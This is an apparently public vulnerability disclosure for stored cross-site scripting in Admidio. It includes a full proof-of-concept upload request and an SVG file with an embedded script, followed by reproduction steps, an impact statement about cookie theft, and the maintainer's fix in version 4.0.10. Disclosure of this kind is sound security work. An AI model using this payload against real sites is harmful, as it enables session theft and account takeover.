Cross-site Scripting (XSS) - Stored in admidio/admidio

Valid

Reported on

Oct 8th 2021


Description

Stored XSS via upload file .svg allows for arbitrary execution of JavaScript

Proof of Concept

// PoC.req
POST /demo_en/adm_program/system/file_upload.php?module=documents_files&mode=upload_files&id=1 HTTP/2
Host: www.admidio.org
Cookie: ADMIDIO_DEMO_d00c3e23_demo_en_SESSION_ID=0ee35dd07ba4a64727e8c9a3463c66d6; ADMIDIO_ADMIDIO_admlogin_adm_SESSION_ID=7aa0730b932b697b593707e5d41805a7; _pk_id.1.d9e6=1cd59d39301bbfdc.1633690352.; _pk_ses.1.d9e6=1; __gads=ID=68d51478d1a7acbc-227a19c950cc00b9:T=1633690355:RT=1633690355:S=ALNI_MbmgpMba4eYhn7CGTCqPzYrO6UYWw
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------325519286641775463042068650248
Content-Length: 647
Origin: https://www.admidio.org
Referer: https://www.admidio.org/demo_en/adm_program/system/file_upload.php?module=documents_files&id=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

-----------------------------325519286641775463042068650248
Content-Disposition: form-data; name="files[]"; filename="xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("Ghostlulz XSS");
   </script>
</svg>
-----------------------------325519286641775463042068650248--

Step to Reproduct

Create a file .svg contain payload

Example

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("Ghostlulz XSS");
   </script>
</svg>

Goto Documents & Files choose to Upload Files

The xss will trigger when view file

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We have contacted a member of the admidio team and are waiting to hear back a year ago
admidio/admidio maintainer validated this vulnerability a year ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Markus
a year ago

Maintainer


We have implemented a whitelist in version 4.0.10 which is just released. Within this whitelist svg is not listed. Thanks for the hint.

Markus Faßbender confirmed that a fix has been merged on cb51a9 a year ago
Markus Faßbender has been awarded the fix bounty
to join this conversation